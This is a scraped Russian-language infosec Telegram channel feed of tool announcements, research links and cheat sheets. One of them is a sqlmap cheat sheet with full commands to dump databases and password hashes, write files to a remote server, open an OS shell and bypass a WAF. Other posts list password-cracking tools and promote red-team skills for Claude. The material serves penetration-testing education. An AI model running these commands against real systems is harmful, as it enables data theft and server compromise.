JWT Auth Bypass TestBed
Песочница для отработки атак на JWT-авторизацию.
→ http://403.brutelogic.net/authz/jwt
Внутри:
Автор также анонсировал Brute One.
По его словам, инструмент включает более 40 техник для поиска подобных уязвимостей в реальных приложениях и позволяет проверять такие случаи за считанные секунды.
→ https://brutelogic.net/brute-one
👉 @cybersecinform
Песочница для отработки атак на JWT-авторизацию.
→ http://403.brutelogic.net/authz/jwt
Внутри:
18 основных сценариев
дополнительные вариации для каждого кейса
реальные ошибки конфигурации и реализации JWT
Автор также анонсировал Brute One.
По его словам, инструмент включает более 40 техник для поиска подобных уязвимостей в реальных приложениях и позволяет проверять такие случаи за считанные секунды.
→ https://brutelogic.net/brute-one
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍2
NVIDIA выпустила SkillSpector
Это инструмент с открытым исходным кодом для поиска уязвимостей в Agent Skills.
Помогает выявлять prompt injection-атаки, утечки данных, уязвимые зависимости, опасный код и другие проблемы безопасности.
→ http://github.com/nvidia/skillspector
👉 @cybersecinform
Это инструмент с открытым исходным кодом для поиска уязвимостей в Agent Skills.
Помогает выявлять prompt injection-атаки, утечки данных, уязвимые зависимости, опасный код и другие проблемы безопасности.
→ http://github.com/nvidia/skillspector
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍1💯1
Исследование по реверс-инжинирингу и эксплуатации уязвимостей умной камеры Xiaomi C400 от Botond Hartmann.
Автор подробно разбирает устройство камеры, процесс получения доступа к прошивке, внутреннюю архитектуру и потенциальные векторы эксплуатации. Материал будет интересен тем, кто занимается IoT-безопасностью, реверс-инжинирингом встроенных систем и поиском уязвимостей в потребительских устройствах.
Статья: https://labs.taszk.io/articles/post/nowyouseemi/
#infosec #iot #reverseengineering #xiaomi #embeddedsecurity
👉 @cybersecinform
Автор подробно разбирает устройство камеры, процесс получения доступа к прошивке, внутреннюю архитектуру и потенциальные векторы эксплуатации. Материал будет интересен тем, кто занимается IoT-безопасностью, реверс-инжинирингом встроенных систем и поиском уязвимостей в потребительских устройствах.
Статья: https://labs.taszk.io/articles/post/nowyouseemi/
#infosec #iot #reverseengineering #xiaomi #embeddedsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍1🔥1
image_2026-06-10_08-21-16.png
831.9 KB
50 YAML-команд, которые стоит знать каждому DevOps-инженеру.
Удобная шпаргалка по Kubernetes, Docker, CI/CD и Infrastructure as Code.
👉 @cybersecinform
Удобная шпаргалка по Kubernetes, Docker, CI/CD и Infrastructure as Code.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Шпаргалка по использованию sqlmap
SQLMAP — это инструмент для проникновения с открытым исходным кодом.
Он позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .
Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.
🟡 Базовый скан URL на наличие уязвимостей:
🟡 Автоматический дамп всех баз данных:
🟡 Извлечение таблиц из конкретной базы данных:
🟡 Извлечение данных из конкретной таблицы:
🟡 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:
🟡 Подбор базы данных и получение информации о пользователях:
🟡 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:
🟡 Выполнение SQL-запросов вручную:
🟡 Проверка на возможность подключения с правами администратора:
🟡 Брутфорсирование паролей пользователей:
🟡 Загрузка файла на удаленный сервер:
🟡 Получение списка столбцов из таблицы:
🟡 Использование прокси-сервера:
🟡 Определение используемой базы данных и версии:
🟡 Атака на POST-запросы (если параметры передаются в теле):
👉 @cybersecinform
SQLMAP — это инструмент для проникновения с открытым исходным кодом.
Он позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .
Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.
sqlmap -u "http://example.com/page.php?id=1"
sqlmap -u "http://example.com/page.php?id=1" --dbs
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"
sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user
sqlmap -u "http://example.com/page.php?id=1" --os-shell
sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"
sqlmap -u "http://example.com/page.php?id=1" --is-dba
sqlmap -u "http://example.com/page.php?id=1" --passwords
sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
sqlmap -u "http://example.com/page.php?id=1" --banner
sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3
OSINT Earth — это передовая платформа, которая служит универсальным каталогом ресурсов для поиска публичных данных со всего мира.
https://osintearth.com/
👉 @cybersecinform
https://osintearth.com/
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍4
Forwarded from infosec
• Друзья, пришло время провести очередной конкурс. На этот раз мы разыгрываем бумажную версию книги "Компьютерные сети. Принципы, технологии, протоколы" - это новое (7-е) издание легендарного учебника для изучения сетевых технологий, которое поступит в продажу через неделю.
• К слову, книга содержит более 1100 страниц информации, а первое издание этой литературы появилось целых 25 лет назад... С того момента авторы постоянно актуализируют материал и выпускают новые издания.
• Итоги подведём 20 Июня в 10:00, при помощи бота, который рандомно выберет 10 победителей. Доставка для победителей бесплатная в зоне действия СДЭК. Удачи❤
Для участия нужно:
1. Быть подписанным на наш канал: Infosec.
2. Подписаться на канал наших друзей: Мир Linux.
3. Нажать на кнопку «Участвовать»;
4. Ждать результат.
Бот может немного подвиснуть — не переживайте! В таком случае просто нажмите еще раз на кнопку «Участвовать».
#Конкурс
• К слову, книга содержит более 1100 страниц информации, а первое издание этой литературы появилось целых 25 лет назад... С того момента авторы постоянно актуализируют материал и выпускают новые издания.
• Итоги подведём 20 Июня в 10:00, при помощи бота, который рандомно выберет 10 победителей. Доставка для победителей бесплатная в зоне действия СДЭК. Удачи
Для участия нужно:
1. Быть подписанным на наш канал: Infosec.
2. Подписаться на канал наших друзей: Мир Linux.
3. Нажать на кнопку «Участвовать»;
4. Ждать результат.
#Конкурс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1
Название поменяли, потому что инструмент давно перерос рамки Claude Code.
Теперь это отдельный open-source CLI, который запускается из любого терминала.
Поддерживает:
Ollama
Groq
DeepSeek
Claude
OpenAI
Grok
Заточен под bug bounty и исследователей безопасности.
Можно запускать локально через Ollama — платная подписка на ИИ не нужна.
Проект уже почти добрался до отметки в 2.5K звёзд на GitHub.
Установка занимает три команды:
git clone https://github.com/shuvonsec/claude-bug-bounty
cd claude-bug-bounty
./install.sh --agent standalone
Новые обновления обещают уже скоро.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Лучший способ использовать Claude Fable в Claude Code и не убить лимиты за первые полчаса:
1. Ставишь модель на Fable 5
2. Reasoning — на Max
3. Просишь Claude запустить динамический workflow, где:
- Fable работает как оркестратор
- Opus забирает на себя тяжёлые reasoning-этапы
Нет смысла тратить интеллект Fable на каждый мелкий шаг. Пусть рулит процессом, а тяжёлую работу отдаёт Opus или даже Sonnet.
👉 @cybersecinform
1. Ставишь модель на Fable 5
2. Reasoning — на Max
3. Просишь Claude запустить динамический workflow, где:
- Fable работает как оркестратор
- Opus забирает на себя тяжёлые reasoning-этапы
Нет смысла тратить интеллект Fable на каждый мелкий шаг. Пусть рулит процессом, а тяжёлую работу отдаёт Opus или даже Sonnet.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🤯1💯1
В ядре Windows при возникновении прерываний, системных вызовов (syscalls) или переключении контекста состояние регистров процессора сохраняется в стек ядра потока (KTHREAD). Ниже приведены структуры данных, которые для этого используются.
KTRAP_FRAME — снимок состояния процессора в момент входа в ядро (trap/interrupt/syscall).
KSWITCH_FRAME — снимок состояния потока, который нужен непосредственно функции KiSwapContext для приостановки потока и его последующего возобновления.
Подробнее об управлении потоками в Windows: https://medium.com/windows-os-internals/windows-internals-thread-management-part-1-9f4227a9e17c
👉 @cybersecinform
KTRAP_FRAME — снимок состояния процессора в момент входа в ядро (trap/interrupt/syscall).
KSWITCH_FRAME — снимок состояния потока, который нужен непосредственно функции KiSwapContext для приостановки потока и его последующего возобновления.
Подробнее об управлении потоками в Windows: https://medium.com/windows-os-internals/windows-internals-thread-management-part-1-9f4227a9e17c
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤3🤯2
Apple выпустила собственный нативный и официальный аналог Docker.
Он позволяет запускать Linux-контейнеры в лёгких виртуальных машинах на macOS.
✓ Совместим с OCI-образами из Docker Hub
✓ Оптимизирован для Apple Silicon
✓ Написан на Swift
→ https://github.com/apple/container
👉 @cybersecinform
Он позволяет запускать Linux-контейнеры в лёгких виртуальных машинах на macOS.
✓ Совместим с OCI-образами из Docker Hub
✓ Оптимизирован для Apple Silicon
✓ Написан на Swift
→ https://github.com/apple/container
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥5👍3😁1
4 MCP сервера, которые реально полезны DevOps-инженеру:
1. Kubernetes MCP
Разбор CrashLoopBackOff подов.
Дебаг падающих деплойментов.
Проверка состояния кластера.
GitHub repo
2. AWS MCP
Анализ скачков затрат в AWS.
Поиск неиспользуемых ресурсов.
Диагностика облачной инфраструктуры.
GitHub repo
3. Terraform MCP
Разбор
Поиск infrastructure drift.
Объяснение изменений инфраструктуры.
GitHub repo
4. Grafana + Prometheus MCP
Разбор latency spikes.
Анализ инцидентов в проде.
Разбор alert storm’ов.
Grafana MCP
Prometheus MCP
👉 @cybersecinform
1. Kubernetes MCP
Разбор CrashLoopBackOff подов.
Дебаг падающих деплойментов.
Проверка состояния кластера.
GitHub repo
2. AWS MCP
Анализ скачков затрат в AWS.
Поиск неиспользуемых ресурсов.
Диагностика облачной инфраструктуры.
GitHub repo
3. Terraform MCP
Разбор
terraform plan.Поиск infrastructure drift.
Объяснение изменений инфраструктуры.
GitHub repo
4. Grafana + Prometheus MCP
Разбор latency spikes.
Анализ инцидентов в проде.
Разбор alert storm’ов.
Grafana MCP
Prometheus MCP
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3😁1
Инструмент недели для DevOps: AirLLM
Чтобы запускать большие модели локально, не обязательно иметь мощную видеокарту.
AirLLM — это open-source инструмент, который позволяет запускать крупные LLM на одной GPU без необходимости загружать всю модель в VRAM целиком.
Он разбивает модель на слои и во время инференса загружает их по одному.
Как это работает
* Сначала AirLLM скачивает полную модель, разбивает её на отдельные слои и сохраняет их на диск.
* Когда приходит запрос, слои начинают поочерёдно загружаться в VRAM.
* Загружается первый слой, выполняются вычисления, затем память освобождается и загружается следующий слой.
* Процесс повторяется для всех слоёв, после чего модель возвращает ответ.
Благодаря такому подходу даже GPU с 4 ГБ видеопамяти может запускать модель размером 70B.
Старт здесь:
https://github.com/lyogavin/airllm
👉 @cybersecinform
Чтобы запускать большие модели локально, не обязательно иметь мощную видеокарту.
AirLLM — это open-source инструмент, который позволяет запускать крупные LLM на одной GPU без необходимости загружать всю модель в VRAM целиком.
Он разбивает модель на слои и во время инференса загружает их по одному.
Как это работает
* Сначала AirLLM скачивает полную модель, разбивает её на отдельные слои и сохраняет их на диск.
* Когда приходит запрос, слои начинают поочерёдно загружаться в VRAM.
* Загружается первый слой, выполняются вычисления, затем память освобождается и загружается следующий слой.
* Процесс повторяется для всех слоёв, после чего модель возвращает ответ.
Благодаря такому подходу даже GPU с 4 ГБ видеопамяти может запускать модель размером 70B.
Старт здесь:
https://github.com/lyogavin/airllm
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥3
Подборка статей по использованию LLM для поиска уязвимостей:
https://github.com/huhusmang/Awesome-LLMs-for-Vulnerability-Detection
👉 @cybersecinform
https://github.com/huhusmang/Awesome-LLMs-for-Vulnerability-Detection
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
10 лучших инструментов для взлома паролей.
👉 @cybersecinform
—> Brutus — старый, но мощный инструмент перебора паролей по сети для разных протоколов.
—> RainbowCrack — использует радужные таблицы для мгновенного взлома хэшей.
—> WFuzz — фреймворк для фуззинга веб-приложений и подбора логинов/паролей.
—> Cain and Abel — комплексный инструмент для восстановления паролей на Windows.
—> John the Ripper — популярный инструмент для взлома паролей по хэшам.
—> THC Hydra — быстрый сетевой брутфорсер с поддержкой многих протоколов.
—> Medusa — многопоточный инструмент для перебора логинов по сети.
—> OphCrack — восстанавливает пароли Windows с помощью радужных таблиц.
—> L0phtCrack — анализирует и взламывает пароли Windows через хэши.
—> Aircrack-ng — взламывает Wi-Fi сети путём анализа и перебора ключей
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥2
Как проиндексировать весь исходный код Linux Kernel (28 млн строк) для AI-агента всего за 3 минуты?
Нужно перестать заставлять агента читать файлы по одному.
Недавно вышел любопытный open-source проект —
Это движок для анализа кода, который заменяет обычный поиск по файлам на высокоскоростной граф знаний, построенный на AST.
Самое интересное здесь — исследование, на котором основан проект.
Согласно результатам из статьи arXiv:2603.27277, где систему тестировали на 31 реальном репозитории, такой подход даёт:
→ снижение расхода токенов на структурные запросы на 99%
→ 83% качества ответов на сложных задачах
→ в 2,1 раза меньше вызовов инструментов
Система строит граф функций, классов, HTTP-маршрутов и связей между сервисами. Когда агенту нужен контекст, он запрашивает данные напрямую из графа, а не перебирает файлы.
Отдельный плюс — всё работает полностью локально.
Без Docker, Ollama и API-ключей.
Скачиваешь бинарник, перезапускаешь агента — и можно работать.
Интересно, насколько сильно такие индексы смогут сократить расходы на AI-разработку в ближайшие годы.
https://github.com/DeusData/codebase-memory-mcp
👉 @cybersecinform
Нужно перестать заставлять агента читать файлы по одному.
Недавно вышел любопытный open-source проект —
codebase-memory-mcp.Это движок для анализа кода, который заменяет обычный поиск по файлам на высокоскоростной граф знаний, построенный на AST.
Самое интересное здесь — исследование, на котором основан проект.
Согласно результатам из статьи arXiv:2603.27277, где систему тестировали на 31 реальном репозитории, такой подход даёт:
→ снижение расхода токенов на структурные запросы на 99%
→ 83% качества ответов на сложных задачах
→ в 2,1 раза меньше вызовов инструментов
Система строит граф функций, классов, HTTP-маршрутов и связей между сервисами. Когда агенту нужен контекст, он запрашивает данные напрямую из графа, а не перебирает файлы.
Отдельный плюс — всё работает полностью локально.
Без Docker, Ollama и API-ключей.
Скачиваешь бинарник, перезапускаешь агента — и можно работать.
Интересно, насколько сильно такие индексы смогут сократить расходы на AI-разработку в ближайшие годы.
https://github.com/DeusData/codebase-memory-mcp
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Если ваши сессии с Claude по безопасности постоянно превращаются в огромные одноразовые промпты, этот репозиторий предлагает более удобный подход.
Claude-Red — это подборка SKILL.md-файлов для специалистов, которые используют Claude в авторизованных Red Team-активностях, Bug Bounty, исследованиях безопасности, CTF и учебных сценариях.
Вместо одного гигантского контекста Claude подгружает нужные методологии по требованию для конкретных типов задач и атак.
Что внутри:
• Формат Claude Skills — каждая методология оформлена как отдельный SKILL.md-файл.
• Широкий охват — 58 навыков в 13 категориях.
• Тестирование веб-приложений — SQLi, XSS, SSRF, SSTI, XXE, IDOR, RCE и другие классы уязвимостей.
• Готовые рабочие процессы — техники, инструменты, типичные кейсы, нестандартные ситуации и варианты развития атаки.
• Гибкая установка — можно клонировать весь набор, подтянуть отдельные категории через sparse-checkout, использовать с Claude Code или установить через
Проект полностью открытый и распространяется по лицензии MIT.
https://github.com/SnailSploit/claude-red
👉 @cybersecinform
Claude-Red — это подборка SKILL.md-файлов для специалистов, которые используют Claude в авторизованных Red Team-активностях, Bug Bounty, исследованиях безопасности, CTF и учебных сценариях.
Вместо одного гигантского контекста Claude подгружает нужные методологии по требованию для конкретных типов задач и атак.
Что внутри:
• Формат Claude Skills — каждая методология оформлена как отдельный SKILL.md-файл.
• Широкий охват — 58 навыков в 13 категориях.
• Тестирование веб-приложений — SQLi, XSS, SSRF, SSTI, XXE, IDOR, RCE и другие классы уязвимостей.
• Готовые рабочие процессы — техники, инструменты, типичные кейсы, нестандартные ситуации и варианты развития атаки.
• Гибкая установка — можно клонировать весь набор, подтянуть отдельные категории через sparse-checkout, использовать с Claude Code или установить через
install.sh.Проект полностью открытый и распространяется по лицензии MIT.
https://github.com/SnailSploit/claude-red
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2